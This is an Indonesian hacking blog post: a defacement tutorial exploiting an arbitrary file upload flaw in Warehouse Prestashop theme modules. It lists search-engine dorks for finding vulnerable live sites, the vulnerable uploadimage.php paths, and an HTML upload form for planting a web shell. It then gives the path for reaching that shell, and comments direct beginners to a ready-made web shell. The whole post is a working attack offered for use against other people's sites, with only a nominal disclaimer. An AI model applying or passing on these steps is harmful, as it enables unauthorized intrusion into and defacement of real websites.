Home CMS Joomla Deface Dunia Komputer Hacking Keamanan Website Security Tester Tutorial Warehouse - Responsive Prestashop 1.6 Arbitrary File Upload

Thursday 23 June 2016

Warehouse - Responsive Prestashop 1.6 Arbitrary File Upload


halo bertemu lagi dengan saya ,uyulcrack.. 
udah lama nih ga upload,,, biasa terlalu sibuk di dunia nyata. 
oke,, lanjut saja nih Tutorial Deface eXploit Warehouse - Responsive Prestashop 1.6 Arbitrary File Upload . *exploit baru nanti dijelaskan dibawah. 
Dan makasih juga untuk bang People_hurt untuk live targetnya ....
Langsung ke tutor


#- Title: Joomla Warehouse - Responsive Prestashop 1.6 Arbitrary File Upload
#- Author: people_hurt
#- Published : 21/06/2016
#- Developer : iqit-commerce
#- Link Download : themeforest .net/item/warehouse-responsive-prestashop-16-theme-blog/3178575
#- Fixed in Version : -
#- Tested on : windows , Linux , Other

 Dork:
inurl:"/modules/simpleslideshow/"
inurl:"/modules/productpageadverts/"
inurl:"/modules/homepageadvertise/"
inurl:"/modules/columnadverts/"
masih bisa dikembangkan, cari /modules/namamoduleyglaen *Use your brain br0

 1. disini gua jelasinnya lu pada udah ada CSRF nya ya jadi langsung praktek aja, pertama cari dulu target lwt Dorking di Search Engine 
2. kalo dah ketemu masukin deh exploit nya satu-satu sampe ketemu ERROR
Exploit &poc : 
- /modules/columnadverts/uploadimage.php
- /modules/homepageadvertise/uploadimage.php
- /modules/productpageadverts/uploadimage.php
- /modules/simpleslideshow/uploadimage.php
- dan lain"
(TERGANTUNG PAS DORKING namamodule NYA)

3. Vulnerability ~ dari kemaren sih, kalo gak error ya Blank *kalau ada cth yg lain yg menandakan vuln pada eXploit ini, silahkan ksh tau dikolom komentar
target.coli/[path]/modules/namamodule/uploadimage.php

 4. nah dibawah ini CSRF nya, masukin aja sourcodenya dan ubah format ke HTML

 CSRF: 

 <form method="POST" action="target.co.li/modules/namamodule/uploadimage.php"
enctype="multipart/form-data">
<input type="file" name="userfile" /><button>Upload</button>
</form>

5. kalo udah buka deh CSRF nya pake browser kesukaan sobat 

Upload File/Shell Lu

 6. kalo sukses upload bakalan kayak gini
Muncul Nama Shell/File yg Lu Upload

 7. akses shell target.co.li/modules/namamodule/slides/namashellLu 
target.coli/[path]/modules/namamodule/slides/namashellLu

 nah setelah itu terserah sobat dah maudiapain, saran dari gua sih titip file aja ama laporin bugnya, jangan salah digunainyaa , gua cuman share apa yang gua bisa dan live praktek gua sendiri jadi kecelakaan ditanggung oleh situ bukan pengarang .... 
ayo Jangan Jadi Silent Reader, minimal kalo gak mau komen, tolong bagikan yak >.<"
atau Like fanspage gua: UyulCrack | Orthellys
Like juga fanspage TKJ Cyber Art | kalau ada yg mau bertanya, terus atau kasih saran dan kritikan Silahkan kirim ke wall FP kami *kritikan dan saran yg membangun ya gengs.

 Semoga bermanfaat & Membantu Sobat..
sampai ketemu lagi BAAAYYYYY .....

 source and thanks to: People_hurt
uyulcrack
Kami Membuat Sejarah, Bukan hanya Barisan Kisah #staycoolandkeep./crootz



Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

Warehouse - Responsive Prestashop 1.6 Arbitrary File Upload Warehouse - Responsive Prestashop 1.6 Arbitrary File Upload MasterBlog TCA 5.0 stars based on 35 reviews halo bertemu lagi dengan saya ,uyulcrack..  udah lama nih ga upload,,, biasa terlalu sibuk di dunia nyata.  oke,, lanjut saja nih Tutor...
Share this with short URL Get Short URLloading short url

Related Posts

Next Post
Previous Post

15 comments

avatar
Balas
Anonymous delete 4 July 2016 at 09:06

wadooooooooo

avatar
Balas
MasterBlog TCA delete 8 July 2016 at 21:09

terimakasih juga telah membaca artikel disini :D
sukses terus yoo

#Nuenomaru

avatar
Balas
MasterBlog TCA delete 28 August 2016 at 16:22

yg dh ke tanem ga ada om,, kami gak pernahhh depes
kalo yg blom, donlod aje di google.

#Nuenomaru

avatar
Balas
ShinChan Hackerz delete 22 September 2016 at 16:53

hello.. i'm ShinChan from N45HT,, i like you're post. thank you (o)

avatar
Balas
MasterBlog TCA delete 23 September 2016 at 10:11

thank you for reading the article on our blog

#Nuenomaru

avatar
Balas
Unknown delete 6 March 2017 at 20:54

gan itu shell nya darimana. maaf masih newbie

avatar
Balas
MasterBlog TCA delete 12 March 2017 at 09:21

itu webshell buatan indoxploit.
utk cara upload webshellnya kan ada csrf file upload nya.

#Nuenomaru

avatar
Balas
IrwanHaku delete 16 May 2017 at 20:18

Namamodule maksudnya Apaan Ya ?

avatar
Balas
Unknown delete 3 July 2017 at 20:43

copas boleh gak , sertakan sumberkok
dan sory we dulu sering copy dari sini tampa ijin dulu

avatar
Balas
Unknown delete 14 January 2018 at 15:01
This comment has been removed by the author.


EmoticonEmoticon

Subscribe to: Post Comments (Atom)